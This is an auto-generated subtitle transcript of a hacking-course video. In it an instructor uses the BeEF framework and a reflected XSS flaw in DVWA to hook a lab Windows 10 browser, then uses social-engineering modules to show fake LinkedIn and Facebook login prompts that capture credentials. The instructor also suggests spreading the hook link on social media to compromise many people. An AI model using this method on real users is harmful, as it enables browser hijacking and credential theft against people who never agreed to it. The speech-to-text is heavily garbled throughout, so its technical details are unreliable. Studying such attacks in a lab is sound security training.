1 00:00:00,060 --> 00:00:08,070 All right, everyone, this is mission this session is about the real hacking will be hacking our Windows 2 00:00:08,070 --> 00:00:15,780 10 machine, a victim of Windows 10 machine and decision making use of beef tools. 3 00:00:16,110 --> 00:00:23,340 And as a part of a vulnerable website, it's going to be the best way for this instance, for this lab 4 00:00:23,610 --> 00:00:28,330 will be making use of some more labs as well, like B VAP and some other as well. 5 00:00:28,350 --> 00:00:32,630 But for this session, we'll be making use of Damadian related Web application. 6 00:00:32,850 --> 00:00:33,180 All right. 7 00:00:33,990 --> 00:00:35,720 So let's get started with the beef. 8 00:00:36,360 --> 00:00:40,260 So if you remember the lab correctly, we have we have three elements. 9 00:00:40,620 --> 00:00:43,380 First, we have beef walking on the galley. 10 00:00:43,830 --> 00:00:47,130 Second, we have a the machine that works on the Windows 10. 11 00:00:47,400 --> 00:00:49,920 And third, we need the vulnerable website. 12 00:00:50,250 --> 00:00:53,560 That is a part of SPW. 13 00:00:53,560 --> 00:00:55,050 Wait, that's TBWA. 14 00:00:56,070 --> 00:00:56,960 So let's get started. 15 00:00:56,970 --> 00:01:01,650 Let's first set up our hacking machine on the hacking machine. 16 00:01:01,770 --> 00:01:03,210 That's Kelly, basically. 17 00:01:03,660 --> 00:01:09,680 And we need to start our beef system beef tool first. 18 00:01:11,220 --> 00:01:11,580 Hmm. 19 00:01:13,800 --> 00:01:14,940 Where exactly it is. 20 00:01:15,350 --> 00:01:19,140 OK, sorry. 21 00:01:19,250 --> 00:01:20,430 I guess. 22 00:01:21,200 --> 00:01:23,120 Yeah, that's it. 23 00:01:23,190 --> 00:01:24,330 And did this. 24 00:01:28,700 --> 00:01:31,270 All right, so let's get started. 25 00:01:31,350 --> 00:01:32,030 But beef. 26 00:01:34,300 --> 00:01:37,370 It would be taking some time to load the project. 27 00:01:38,650 --> 00:01:40,760 All right, and here we go. 28 00:01:41,320 --> 00:01:43,370 So the beep beep system has started. 29 00:01:43,390 --> 00:01:44,830 Let's go to the browser. 30 00:01:51,890 --> 00:02:04,230 OK, and we need to go to 127 zero zero upon you, I know, that's what I know, right? 31 00:02:04,850 --> 00:02:10,570 So this is where we'll be managing or managing all the devices. 32 00:02:11,180 --> 00:02:14,760 So currently we don't have any active device at this moment. 33 00:02:15,350 --> 00:02:18,830 Let's keep it on the left hand side. 34 00:02:20,000 --> 00:02:23,500 OK, so this would be our hacking machine on the right. 35 00:02:23,900 --> 00:02:26,570 We need our Windows 10 machine. 36 00:02:28,570 --> 00:02:40,660 All right, here it is and you go, OK, this is our window stand with the machine. 37 00:02:41,230 --> 00:02:43,210 Where will be? 38 00:02:45,160 --> 00:02:52,870 Yeah, yeah, this is our weakness, stand the machine, and we also need our BBWAA. 39 00:02:53,140 --> 00:02:58,850 OK, Bill will not be accessing the machine, but just remember, what's the IP address? 40 00:02:58,870 --> 00:03:01,880 OK, so so this is pretty clear. 41 00:03:02,530 --> 00:03:03,940 What do you see on the left? 42 00:03:04,940 --> 00:03:06,420 That's our beef. 43 00:03:07,020 --> 00:03:09,490 What do you see on the right up there. 44 00:03:09,560 --> 00:03:11,030 That's our victim machine. 45 00:03:11,080 --> 00:03:12,540 What do you see on the bottom. 46 00:03:13,000 --> 00:03:18,360 That's our that's our BBWAA, which is the infected website. 47 00:03:19,000 --> 00:03:19,360 All right. 48 00:03:19,360 --> 00:03:20,610 So let's get started. 49 00:03:21,970 --> 00:03:26,580 What we need first is we need the code, OK? 50 00:03:26,860 --> 00:03:31,060 We need to have those JavaScript code to be ready. 51 00:03:31,370 --> 00:03:40,950 OK, and now the first thing that we would do is will be will be along the way from the victim machine. 52 00:03:41,440 --> 00:03:47,620 Just imagine a situation where the machine has got the victim machine has got some length. 53 00:03:47,980 --> 00:03:55,630 And through that link it is sending, you know, our victim machine is sending some JavaScript posting 54 00:03:55,630 --> 00:04:02,260 basically or submitting some JavaScript code to develop a site which is on the bottom over here. 55 00:04:02,680 --> 00:04:08,710 And we'll see if the BBWAA reflecting those code back to the system or not. 56 00:04:08,980 --> 00:04:12,130 If yes, then it is actually affected. 57 00:04:12,130 --> 00:04:19,300 It is already vulnerable and system will be compromised by the attacking machine, by the beef and beef. 58 00:04:19,300 --> 00:04:22,100 Quickly get the access to the machine in that case. 59 00:04:22,120 --> 00:04:25,450 OK, so let's open the explorer. 60 00:04:28,700 --> 00:04:29,220 OK. 61 00:04:29,780 --> 00:04:33,380 And after doing that, that's. 62 00:04:35,180 --> 00:04:36,890 Let's go to Ben. 63 00:04:40,020 --> 00:04:52,620 All right, so we'll be logging to our OSB, BBWAA, which is and this is all SBW, and in this there 64 00:04:52,620 --> 00:04:59,160 are multiple projects running that are multiple infected sites will be going to TBWA, which is -- 65 00:04:59,160 --> 00:05:02,000 vulnerable Web application once you go there. 66 00:05:02,010 --> 00:05:12,120 The default credentials, as I've been advent and then get into it, we can perform many activity with 67 00:05:12,120 --> 00:05:12,420 this. 68 00:05:13,200 --> 00:05:20,010 What is more important, what is more important as far as this session is concerned, it's The Exorcist 69 00:05:20,010 --> 00:05:21,400 crosseyed script and deflected. 70 00:05:21,610 --> 00:05:24,330 OK, so this is a feel, the feel. 71 00:05:24,660 --> 00:05:26,600 This is a feel in this directory. 72 00:05:26,610 --> 00:05:31,500 OK, well you can quickly get to see if this is infected by yourself. 73 00:05:31,920 --> 00:05:33,790 OK, you can quickly get the idea. 74 00:05:33,790 --> 00:05:41,850 And let's see if being a user on Windows 10 on Windows Machine at this moment, if I want to see if 75 00:05:41,850 --> 00:05:48,070 I'm submitting some JavaScript code, is it sending me back as it is or is it making any changes? 76 00:05:48,750 --> 00:05:52,180 So what you can do is just submit any script. 77 00:05:53,370 --> 00:05:56,960 So let me make use of a very simple script. 78 00:05:57,540 --> 00:06:00,440 So this is a syntax, I hope, you know, as of now. 79 00:06:01,050 --> 00:06:08,200 So whatever JavaScript you want to make it in the stock, you know, this has to be decided with the 80 00:06:08,220 --> 00:06:10,880 script and with a script as well. 81 00:06:11,460 --> 00:06:18,270 And and then you can let's say in our case, we are just adding a lot just to give us a prompt. 82 00:06:18,390 --> 00:06:18,850 OK. 83 00:06:19,530 --> 00:06:19,970 Hello. 84 00:06:21,180 --> 00:06:29,490 And once you submit, you see this, you have submitted a scapegoat and is it giving you back on your 85 00:06:29,490 --> 00:06:29,940 system? 86 00:06:30,390 --> 00:06:31,800 That's JavaScript code. 87 00:06:31,990 --> 00:06:35,240 You've got the idea that exactly it is happening. 88 00:06:35,250 --> 00:06:39,710 That means the site, this DPW is actually infected. 89 00:06:40,170 --> 00:06:43,230 OK, so let's submit something over here. 90 00:06:43,230 --> 00:06:44,070 Very interesting. 91 00:06:44,400 --> 00:06:51,480 What we are going to do is will be making use of this whole Geass, OK, will be making use of this 92 00:06:51,480 --> 00:06:53,130 whole year and will be submitting. 93 00:06:53,160 --> 00:06:54,090 Here it is. 94 00:06:54,420 --> 00:06:54,730 Right. 95 00:06:54,750 --> 00:07:01,650 So what it mean to say is I will be making use of JavaScript to be redirected to downloading Ribot's. 96 00:07:01,680 --> 00:07:07,790 I mean, starting to be redirected to our belief system so that the beef get the session request. 97 00:07:08,670 --> 00:07:14,730 So what we could do is we can make use of script again, the same style. 98 00:07:17,120 --> 00:07:26,930 All right, and now, because we want to add a redirection of the site, we have to specify the you 99 00:07:26,960 --> 00:07:37,610 are so you have to start seeing that kid on the first starting the next goal and the final step. 100 00:07:38,000 --> 00:07:51,020 Then the IP address is the door to door, one door, then sorry, one, then three times. 101 00:07:51,030 --> 00:07:54,800 And then it's OK to cheat. 102 00:07:55,060 --> 00:07:55,160 Yes. 103 00:07:55,530 --> 00:08:03,380 OK, so this is pretty much what exactly it is looking for and also keep your system open so that we 104 00:08:03,380 --> 00:08:06,140 could see any situation is coming to it. 105 00:08:06,650 --> 00:08:14,990 Let's submit and see if there's any request coming into the system and we are supposed to have some 106 00:08:14,990 --> 00:08:16,310 session coming back. 107 00:08:17,030 --> 00:08:18,760 We should have some system. 108 00:08:18,920 --> 00:08:19,450 All right. 109 00:08:19,460 --> 00:08:21,260 So that's lovely. 110 00:08:21,260 --> 00:08:23,360 The moment we hit Enter, it took some time. 111 00:08:23,360 --> 00:08:26,990 And now what was there earlier as offline? 112 00:08:27,290 --> 00:08:29,360 Now you see the same system. 113 00:08:29,380 --> 00:08:31,490 Now the system is coming as online. 114 00:08:31,490 --> 00:08:36,740 You see this this active system IP address is then not one dot one, not six. 115 00:08:36,740 --> 00:08:46,350 If you can go here and you see the IP, sorry, I can think you see the standards. 116 00:08:46,390 --> 00:08:50,650 You are 136 Quietist and 210 01. 117 00:08:51,560 --> 00:08:58,940 Well, is because that's the mediator who is the mediator then the the last B.W. with the down vulnerable 118 00:08:58,940 --> 00:09:02,360 application and the mediator which is the requester in between. 119 00:09:02,840 --> 00:09:09,800 So if let's say we go here, we could even see in here on this next step, just after the basic Metsu, 120 00:09:09,800 --> 00:09:15,740 the other tab, which is the requestor requester, is the mediator, which is sending the request on 121 00:09:15,740 --> 00:09:16,890 behalf of the victim. 122 00:09:17,480 --> 00:09:17,780 Right. 123 00:09:18,350 --> 00:09:22,700 So the two then not zero out, one that well, we get this right. 124 00:09:23,480 --> 00:09:25,160 How it can be really helpful. 125 00:09:25,840 --> 00:09:29,420 Remember this in order to the we we have made use of the script. 126 00:09:29,420 --> 00:09:34,160 The script can be shared in the social media platform through any website link. 127 00:09:34,160 --> 00:09:39,890 And people go there, click on the links and there could be hundreds of thousand people get compromised 128 00:09:39,890 --> 00:09:40,300 quickly. 129 00:09:40,730 --> 00:09:41,020 Right. 130 00:09:41,060 --> 00:09:42,230 That's the one thing. 131 00:09:42,530 --> 00:09:45,460 Now, let's do some nasty stuff here. 132 00:09:46,160 --> 00:09:47,480 The station is still active. 133 00:09:48,950 --> 00:09:56,240 Now, what we can do is let's look at some of the information for this or let me increase the size of 134 00:09:56,240 --> 00:09:56,540 this. 135 00:09:56,900 --> 00:10:01,800 And you can see the quickly we do it, we get the all the information of the system. 136 00:10:02,210 --> 00:10:08,750 OK, so the moment you go into details, you get to see about all the capabilities, what can work, 137 00:10:08,750 --> 00:10:09,550 what not. 138 00:10:10,130 --> 00:10:17,030 And you also get the information about the engines, what is the operating systems and everything, 139 00:10:17,030 --> 00:10:19,790 everything you can think of resolution of the system. 140 00:10:20,150 --> 00:10:21,880 Is it a part of any virtual machine? 141 00:10:21,890 --> 00:10:23,900 Yes, it is designed to watch a machine. 142 00:10:23,930 --> 00:10:25,640 Even you can see over here as well. 143 00:10:25,970 --> 00:10:30,320 It is coming in from what your machines do, logs, commands and everything. 144 00:10:30,960 --> 00:10:33,970 What we are really interested about is the commands. 145 00:10:33,980 --> 00:10:34,250 Right. 146 00:10:34,700 --> 00:10:41,810 So what are we going to do is will be, you know, in this case, will try to fish this user or will 147 00:10:41,810 --> 00:10:48,740 try to hack maybe his LinkedIn account or maybe his Instagram account or maybe Facebook account and 148 00:10:48,740 --> 00:10:55,340 how exactly we are going to do that by grabbing those username and password, the credentials basically. 149 00:10:55,340 --> 00:10:59,630 Let's say we want to we want to get the access to his LinkedIn account. 150 00:10:59,630 --> 00:11:02,090 We want hacked his account for sure. 151 00:11:02,660 --> 00:11:07,040 In that case, you can click on social engineering in the command section. 152 00:11:07,220 --> 00:11:08,870 You can see there are multiple options. 153 00:11:08,870 --> 00:11:16,760 I'll be taking it this, because this way you get the real world idea about how those accounts were 154 00:11:17,150 --> 00:11:18,650 compromised and basically happened. 155 00:11:18,920 --> 00:11:21,350 You see multiple options are available. 156 00:11:22,370 --> 00:11:25,160 You would see multiple options are basically being available. 157 00:11:25,460 --> 00:11:32,600 And every every feature those takes to whois user interface, every everything every feature has a different 158 00:11:33,140 --> 00:11:33,950 color to it. 159 00:11:34,220 --> 00:11:39,620 What do you see on the green that basically indicates is exploitable and undetectable? 160 00:11:39,860 --> 00:11:44,180 If you try, that user will not be knowing that what exactly is happening. 161 00:11:44,390 --> 00:11:48,770 And it is completely it can it is completely hackable or exploitable. 162 00:11:49,210 --> 00:11:55,850 What do you see on the orange color that indicates that indicates that it's work for the target, but 163 00:11:55,850 --> 00:11:57,500 it can be detected as well. 164 00:11:57,620 --> 00:12:04,070 You know, and what you see on the other color may be red as something which is not going to work in 165 00:12:04,070 --> 00:12:05,000 that situation. 166 00:12:05,420 --> 00:12:07,280 There could be some great color as well. 167 00:12:07,280 --> 00:12:10,460 If you go in more detail, there could be some. 168 00:12:10,760 --> 00:12:11,150 Yeah. 169 00:12:11,270 --> 00:12:12,740 So you see this gray color. 170 00:12:12,740 --> 00:12:16,270 It indicates that it's not yet verified, so. 171 00:12:17,190 --> 00:12:21,120 Not even beef is not sure that that would really work. 172 00:12:22,140 --> 00:12:28,200 Let's drive it some according to type or something so you can go to social engineering and over there 173 00:12:28,200 --> 00:12:33,450 you will find petty theft and or there you can just try making use of. 174 00:12:33,450 --> 00:12:39,030 Yeah, we can try making use of any any sort of comments I made use of just Facebook. 175 00:12:39,360 --> 00:12:46,860 You can execute our probably you can make use of it and probably I have already tried some. 176 00:12:47,440 --> 00:12:53,370 So what you can do is you can make use of any of such commands or you can make new one as well. 177 00:12:53,670 --> 00:12:57,090 So what I could do is probably. 178 00:13:01,010 --> 00:13:08,900 Yeah, so let's say there's I want to get access to the LinkedIn account in this case, so let me select 179 00:13:08,900 --> 00:13:15,710 the LinkedIn, the you can select what the background is and all the sunbaking stuff, and then you 180 00:13:15,710 --> 00:13:19,040 can define what would be the you are a custom logo and everything. 181 00:13:19,040 --> 00:13:23,240 So you can you can select what would be the defined or your desired logo. 182 00:13:23,240 --> 00:13:25,380 In that case, you can re execute it. 183 00:13:26,030 --> 00:13:32,170 OK, so the moment you do that, you see on the right hand side this is what it is coming this time 184 00:13:32,180 --> 00:13:38,330 out, you can you know, it could be any website it might ask you for, you know, in order to get the 185 00:13:38,330 --> 00:13:39,310 access to the site. 186 00:13:39,650 --> 00:13:42,110 Well, I have you have considered BBWAA, right? 187 00:13:42,120 --> 00:13:48,860 It could be any any kind of site which might ask you to login with your Facebook or Instagram account 188 00:13:48,860 --> 00:13:51,020 or LinkedIn account to get access to the system. 189 00:13:51,020 --> 00:13:51,220 Right. 190 00:13:51,650 --> 00:13:53,020 So that can be done as well. 191 00:13:53,390 --> 00:13:59,720 We can even try with any other stuff, maybe a YouTube account or maybe it's a Facebook account so we 192 00:13:59,720 --> 00:14:03,500 can try doing the Facebook, we can try executing it as well. 193 00:14:03,500 --> 00:14:05,570 And it will be taking effect. 194 00:14:06,350 --> 00:14:12,290 You can try limiting one feature and you can try executing many other features as well. 195 00:14:12,290 --> 00:14:22,740 Accordingly, once the feature has been executed, let's say in this case we made use of LinkedIn, 196 00:14:23,980 --> 00:14:29,870 OK, and we put the password like user test and test. 197 00:14:31,340 --> 00:14:32,420 You just sign it. 198 00:14:32,850 --> 00:14:33,280 Okay. 199 00:14:33,830 --> 00:14:37,490 And the moment users sign in, we get the command results. 200 00:14:38,480 --> 00:14:42,710 So we get the command result as this test and test. 201 00:14:42,710 --> 00:14:43,040 Right. 202 00:14:43,070 --> 00:14:48,150 So this is something which we can keep trying and we'll get the result about it. 203 00:14:48,420 --> 00:14:57,020 But so this is what's the deal when you keep going with it and try to get more and more information 204 00:14:57,020 --> 00:14:58,710 about each individual family. 205 00:14:59,270 --> 00:15:05,090 So this is like every for every commands you can execute all those features. 206 00:15:05,090 --> 00:15:05,360 Right. 207 00:15:05,660 --> 00:15:11,390 So you can do it for Facebook, you can do it for LinkedIn, or maybe you can customize your self and 208 00:15:11,390 --> 00:15:12,950 then execute that. 209 00:15:12,950 --> 00:15:16,160 And the problem will come up for the user end user type. 210 00:15:16,650 --> 00:15:20,030 His desired is actually ID and password. 211 00:15:20,510 --> 00:15:22,340 For him it would be invalid. 212 00:15:23,300 --> 00:15:29,380 It will say it's invalid password for for us it would be the commands that comes to us. 213 00:15:29,400 --> 00:15:29,670 Right. 214 00:15:30,500 --> 00:15:32,840 So that's how we can keep trying it. 215 00:15:32,840 --> 00:15:39,350 And we get more information about what exactly happening on to the system at this moment of time. 216 00:15:39,680 --> 00:15:46,850 I hope you got the sense about how to make use of a contact are probably for if anything, maybe, but 217 00:15:46,860 --> 00:15:49,490 LinkedIn, Facebook or any sort of stuff. 218 00:15:49,490 --> 00:15:55,650 As you have seen, this is being available for you know, this is being available for many of the comments 219 00:15:55,650 --> 00:16:01,090 I so you can drive at LinkedIn, Facebook when Windows ideas and everything as well. 220 00:16:02,150 --> 00:16:08,690 This was this was for learning purpose and be there whenever you tried this. 221 00:16:08,690 --> 00:16:18,860 And remember this, the browser like Chrome, Microsoft page, keep, you know, keep keep the other 222 00:16:18,860 --> 00:16:20,660 security patches updated. 223 00:16:20,900 --> 00:16:26,960 And so that to come over come from this kind of football abilities which can be exploited to be. 224 00:16:27,110 --> 00:16:34,580 So there could be a situation where in such command it doesn't work on Chrome in such some situation. 225 00:16:34,580 --> 00:16:35,990 Or maybe Microsoft is. 226 00:16:35,990 --> 00:16:38,690 Well, I mean, Microsoft age. 227 00:16:38,870 --> 00:16:45,410 Well, and if there are some victim machines which are not updated, it is definitely going to work. 228 00:16:45,410 --> 00:16:50,990 But for some of the system, it might not work as well if those are running the up to date system. 229 00:16:50,990 --> 00:16:51,410 All right. 230 00:16:51,710 --> 00:16:58,850 So I hope you got the idea about how to how to take the how to hook JavaScript to the system, how to 231 00:16:58,850 --> 00:17:02,060 send some, you know, a blog. 232 00:17:02,060 --> 00:17:07,340 I mean, login box as well for the user, maybe for different accounts. 233 00:17:07,820 --> 00:17:09,020 I hope you got the idea. 234 00:17:09,020 --> 00:17:10,280 We'll get you in the next session. 235 00:17:10,280 --> 00:17:10,760 Thank you.